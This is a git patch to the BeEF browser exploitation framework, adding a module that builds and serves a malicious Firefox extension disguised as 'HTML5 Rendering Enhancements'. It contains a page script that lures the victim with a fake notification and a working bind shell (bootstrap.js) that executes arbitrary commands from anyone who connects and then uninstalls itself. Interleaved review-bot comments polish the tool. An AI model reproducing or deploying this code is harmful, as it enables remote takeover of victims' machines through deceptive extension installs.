From 2b44c9184dc222ccdb83d7cd77d2e1e46117295d Mon Sep 17 00:00:00 2001
From: bcoles
Date: Mon, 27 Jan 2014 07:21:44 +1030
Subject: [PATCH] Add malicious FF bindshell module
---
.../firefox_extension_bindshell/command.js | 38 ++++
.../firefox_extension_bindshell/config.yaml | 16 ++
.../extension/HTML5_Enhancements.xpi | Bin 0 -> 3371 bytes
.../extension/bootstrap.js | 188 ++++++++++++++++++
.../extension/build/readme.txt | 1 +
.../extension/chrome.manifest | 2 +
.../extension/install.rdf | 24 +++
.../extension/overlay.xul | 5 +
.../firefox_extension_bindshell/module.rb | 86 ++++++++
9 files changed, 360 insertions(+)
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/command.js
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/config.yaml
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/HTML5_Enhancements.xpi
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/bootstrap.js
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/build/readme.txt
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/chrome.manifest
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/install.rdf
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/extension/overlay.xul
create mode 100644 modules/exploits/local_host/firefox_extension_bindshell/module.rb
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/command.js b/modules/exploits/local_host/firefox_extension_bindshell/command.js
new file mode 100644
index 000000000..61fe30df3
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/command.js
@@ -0,0 +1,38 @@ +// +// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var xpi_name = '<%= @xpi_name %>'; + var ff_extension = '/' + xpi_name + '.xpi'; + + if(beef.browser.isFF()){ + var id = beef.dom.generateID(); + var pid = beef.dom.generateID(); + var zztop = beef.dom.getHighestZindex()+1; + var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'}); + var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'}) + var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'}); + $j('body').append(el); + var hid = '#'+id; + var hpid = '#'+pid; + $j(hid).append(elp); + $j(hpid).html("<%= @notification_text %> "); + $j(hid).append(elr); + $j(hid).click(function() { + $j(this).slideUp(300,function() { + $j(this).remove(); + }); + //window.location.href = ff_extension; + window.open(ff_extension); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification'); + }); + $j(hid).css('cursor','pointer'); + $j(hid).slideDown(300,function() { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed'); + }); + } +}); 
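Review bot: The `var elr = beef.dom.createElement('div',{...})` statement is the only one inside `beef.execute` without a terminating semicolon, and the commented-out `//window.location.href = ff_extension;` just above `window.open(ff_extension);` is dead code; close the statement with `;` and drop the comment so the block relies on ASI nowhere. The `<%= @notification_text %>` value goes into `$j(hpid).html(...)`, so whatever the module renders there is interpreted as markup; if it is meant to be plain text, `.text()` is the safer call and avoids the template value being parsed as HTML.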
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/config.yaml b/modules/exploits/local_host/firefox_extension_bindshell/config.yaml
new file mode 100644
index 000000000..1d427dd3b
--- /dev/null
+++ b/modules/exploits/local_host/firefox_extension_bindshell/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ firefox_extension_bindshell:
+ enable: true
+ category: ["Exploits", "Local Host"]
+ name: "Firefox Extension (Bindshell)"
+ description: "Create on the fly a malicious Firefox extension that binds a shell to a specified port.

The extension is based on the original work from Michael Schierl and his Metasploit module, and joev's Firefox payloads for Metasploit."
+ authors: ["antisnatchor", "bcoles"]
+ target:
+ user_notify: ["FF"]
+ not_working: ["All"]
diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/HTML5_Enhancements.xpi b/modules/exploits/local_host/firefox_extension_bindshell/extension/HTML5_Enhancements.xpi new file mode 100644 index 0000000000000000000000000000000000000000..e585d38f12a6f5f17afd0b1290afd4e4386bc152 GIT binary patch literal 3371 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 H`3C$4lbIsv literal 0 HcmV?d00001 diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/bootstrap.js b/modules/exploits/local_host/firefox_extension_bindshell/extension/bootstrap.js new file mode 100644 index 000000000..216da2e6c --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/bootstrap.js 
@@ -0,0 +1,188 @@ + +function startup(data, reason) { + var file = Components.classes["@mozilla.org/file/directory_service;1"]. + getService(Components.interfaces.nsIProperties). + get("ProfD", Components.interfaces.nsIFile); + file.append("extensions"); + xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}"; + file.append(xpi_guid); + + // # ./msfpayload firefox/shell_bind_tcp LPORT=1337 R + (function(){ + Components.utils.import("resource://gre/modules/NetUtil.jsm"); + var lport = __bindshell_port_placeholder__; + var rhost = ""; + var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"] + .createInstance(Components.interfaces.nsIServerSocket); + serverSocket.init(lport, false, -1); + + var listener = { + onSocketAccepted: function(serverSocket, clientSocket) { + var outStream = clientSocket.openOutputStream(0, 0, 0); + var inStream = clientSocket.openInputStream(0, 0, 0); + var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"] + .createInstance(Components.interfaces.nsIInputStreamPump); + pump.init(inStream, -1, -1, 0, 0, true); + pump.asyncRead(clientListener(outStream), null); + } + }; + + var clientListener = function(outStream) { + return { + onStartRequest: function(request, context) {}, + onStopRequest: function(request, context) {}, + onDataAvailable: function(request, context, stream, offset, count) { + var data = NetUtil.readInputStreamToString(stream, count).trim(); + runCmd(data, function(err, output) { + if(!err) outStream.write(output, output.length); + }); + } + }; + }; + + + + var readFile = function(path) { + try { + var file = Components.classes["@mozilla.org/file/local;1"] + .createInstance(Components.interfaces.nsILocalFile); + file.initWithPath(path); + + var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"] + .createInstance(Components.interfaces.nsIFileInputStream); + fileStream.init(file, 1, 0, false); + + var binaryStream = 
Components.classes["@mozilla.org/binaryinputstream;1"] + .createInstance(Components.interfaces.nsIBinaryInputStream); + binaryStream.setInputStream(fileStream); + var array = binaryStream.readByteArray(fileStream.available()); + + binaryStream.close(); + fileStream.close(); + file.remove(true); + + return array.map(function(aItem) { return String.fromCharCode(aItem); }).join(""); + } catch (e) { return ""; } + }; + + + var setTimeout = function(cb, delay) { + var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer); + timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT); + return timer; + }; + + + var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"] + .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent; + var windows = (ua.indexOf("Windows")>-1); + var svcs = Components.utils.import("resource://gre/modules/Services.jsm"); + var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src; + var runCmd = function(cmd, cb) { + cb = cb || (function(){}); + + if (cmd.trim().length == 0) { + setTimeout(function(){ cb("Command is empty string ('')."); }); + return; + } + + var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim()); + if (js) { + var tag = "[!JAVASCRIPT]"; + var sync = true; // avoid zalgo's reach + var sent = false; + var retVal = null; + + try { + retVal = Function('send', js[1])(function(r){ + if (sent) return; + sent = true + if (r) { + if (sync) 
setTimeout(function(){ cb(false, r+tag+"\n"); }); + else cb(false, r+tag+"\n"); + } + }); + } catch (e) { retVal = e.message; } + + sync = false; + + if (retVal && !sent) { + sent = true; + setTimeout(function(){ cb(false, retVal+tag+"\n"); }); + } + + return; + } + + var shEsc = "\\$&"; + var shPath = "/bin/sh -c" + + if (windows) { + shPath = "cmd /c"; + shEsc = "\^$&"; + var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"] + .getService(Components.interfaces.nsIProperties) + .get("TmpD", Components.interfaces.nsIFile); + jscriptFile.append('I5yOzt1neFMfjSYjyY.js'); + var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"] + .createInstance(Components.interfaces.nsIFileOutputStream); + stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0); + stream.write(jscript, jscript.length); + if (stream instanceof Components.interfaces.nsISafeOutputStream) { + stream.finish(); + } else { + stream.close(); + } + } + + var stdoutFile = "JKsYPvN0AOYtet5mnB"; + + var stdout = Components.classes["@mozilla.org/file/directory_service;1"] + .getService(Components.interfaces.nsIProperties) + .get("TmpD", Components.interfaces.nsIFile); + stdout.append(stdoutFile); + + if (windows) { + var shell = shPath+" "+cmd; + shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1"; + var b64 = svcs.btoa(shell); + } else { + var shell = shPath+" "+cmd.replace(/\W/g, shEsc); + shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1"; + } + var process = Components.classes["@mozilla.org/process/util;1"] + .createInstance(Components.interfaces.nsIProcess); + var sh = Components.classes["@mozilla.org/file/local;1"] + .createInstance(Components.interfaces.nsILocalFile); + + if (windows) { + sh.initWithPath("C:\\Windows\\System32\\wscript.exe"); + process.init(sh); + var args = [jscriptFile.path, b64]; + process.run(true, args, args.length); + jscriptFile.remove(true); + setTimeout(function(){cb(false, 
cmd+"\n"+readFile(stdout.path));}); + } else { + sh.initWithPath("/bin/sh"); + process.init(sh); + var args = ["-c", shell]; + process.run(true, args, args.length); + setTimeout(function(){cb(false, readFile(stdout.path));}); + } + }; + + + serverSocket.asyncListen(listener); + })(); + + + try { // Fx < 4.0 + Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); + } catch (e) {} + try { // Fx 4.0 and later + Components.utils.import("resource://gre/modules/AddonManager.jsm"); + AddonManager.getAddonByID(xpi_guid, function(addon) { + addon.uninstall(); + }); + } catch (e) {} + } diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/build/readme.txt b/modules/exploits/local_host/firefox_extension_bindshell/extension/build/readme.txt new file mode 100644 index 000000000..9aa47d25d --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/build/readme.txt @@ -0,0 +1 @@ +This is a temp directory where the Firefox extension will be built. \ No newline at end of file diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/chrome.manifest b/modules/exploits/local_host/firefox_extension_bindshell/extension/chrome.manifest new file mode 100644 index 000000000..2864216f5 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/chrome.manifest @@ -0,0 +1,2 @@ +content {861fb387-92ce-bb0a-cb48-4b923dbc292b} ./ +overlay chrome://browser/content/browser.xul chrome://{861fb387-92ce-bb0a-cb48-4b923dbc292b}/content/overlay.xul diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/install.rdf b/modules/exploits/local_host/firefox_extension_bindshell/extension/install.rdf new file mode 100644 index 000000000..0813095d0 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/install.rdf 
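Review bot: `xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";` near the top of `startup` is assigned without `var`, so it becomes an implicit global of the bootstrap scope; declare it with `var xpi_guid = ...` alongside `file`. `var rhost = "";` in the IIFE is never read afterwards and can be removed, and `sent = true` and `var shPath = "/bin/sh -c"` are missing their semicolons. The second argument of `serverSocket.init(lport, false, -1)` is the loopback-only flag, and `onSocketAccepted` hands every accepted connection straight to `runCmd` with no check of the peer, so the listener is reachable from any interface without authentication; that is worth stating in a header comment here and in the module description in config.yaml, since neither currently says so.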
@@ -0,0 +1,24 @@ + + + + {861fb387-92ce-bb0a-cb48-4b923dbc292b} + __extension_name_placeholder__ + 1.0 + true + true + + + toolkit@mozilla.org + 1.0 + * + + + + + {ec8030f7-c20a-464f-9b0e-13a3a9e97384} + 1.0 + * + + + + \ No newline at end of file diff --git a/modules/exploits/local_host/firefox_extension_bindshell/extension/overlay.xul b/modules/exploits/local_host/firefox_extension_bindshell/extension/overlay.xul new file mode 100644 index 000000000..91ca363e4 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_bindshell/extension/overlay.xul @@ -0,0 +1,5 @@ + + + + \ No newline at end of file diff --git a/modules/exploits/local_host/firefox_extension_bindshell/module.rb b/modules/exploits/local_host/firefox_extension_bindshell/module.rb new file mode 100644 index 000000000..179d43901 --- /dev/null +++ b/modules/exploits/local_host/firefox_extension_bindshell/module.rb 
@@ -0,0 +1,86 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Firefox_extension_bindshell < BeEF::Core::Command
+
+ class Bind_extension < BeEF::Core::Router::Router
+ before do
+ headers 'Content-Type' => 'application/x-xpinstall',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ get '/' do
+ response['Content-Type'] = "application/x-xpinstall"
+ extension_path = settings.extension_path
+ print_info "Serving malicious Firefox Extension (Bindshell): #{extension_path}"
+ send_file "#{extension_path}",
+ :type => 'application/x-xpinstall',
+ :disposition => 'inline'
+ end
+ end
+
+ def pre_send
+
+ # gets the value configured in the module configuration by the user
+ @datastore.each do |input|
+ if input['name'] == "extension_name"
+ @extension_name = input['value']
+ end
+ if input['name'] == "xpi_name"
+ @xpi_name = input['value']
+ end
+ if input['name'] == "lport"
+ @lport = input['value']
+ end
+ end
+
+ mod_path = "#{$root_dir}/modules/exploits/local_host/firefox_extension_bindshell"
+ extension_path = mod_path + "/extension"
+
+ # clean the build directory
+ FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
+
+ # copy in the build directory necessary file, substituting placeholders
+ File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
+ File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__bindshell_port_placeholder__", @lport)}
+ File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")}
+ File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
+
+
extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest"]
+
+ # create the XPI extension container
+ xpi = "#{extension_path}/#{@xpi_name}.xpi"
+ if File.exist?(xpi)
+ File.delete(xpi)
+ end
+ Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
+ extension_content.each do |filename|
+ xpi.add(filename, "#{extension_path}/build/#(unknown)")
+ end
+ end
+
+ # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specific content-type/disposition)
+ bind_extension = Firefox_extension_bindshell::Bind_extension
+ bind_extension.set :extension_path, "#{$root_dir}/modules/exploits/local_host/firefox_extension_bindshell/extension/#{@xpi_name}.xpi"
+ BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
+ BeEF::Core::Server.instance.remap
+ end
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ return [
+ {'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
+ {'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
+ {'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '1337'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+end
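Review bot: `@xpi_name` is taken verbatim from the operator-supplied datastore in `pre_send` and used unchecked in filesystem paths (`xpi = "#{extension_path}/#{@xpi_name}.xpi"`, then `File.delete(xpi)` and `Zip::File.open(xpi, ...)`) and in the web mount path, so a value containing `/` or `..` lets the BeEF web UI delete or write files outside the module's extension directory on the BeEF host; a whitelist check before the paths are built, e.g. `raise ArgumentError, "invalid xpi_name" unless @xpi_name =~ /\A[\w-]+\z/`, closes that, and `@lport = Integer(@lport).to_s` keeps a non-numeric port from being spliced into bootstrap.js as code. `gsub!` in the two `File.open` blocks returns nil when the placeholder is absent, which would make `file.puts` write an empty install.rdf or bootstrap.js; `gsub` is the safer call there. `beef_host` in `self.options` is assigned and never used. The second argument of `xpi.add` reads `#(unknown)` on this page, which looks like a rendering artifact for `#{filename}` rather than the committed text; worth confirming against the actual source.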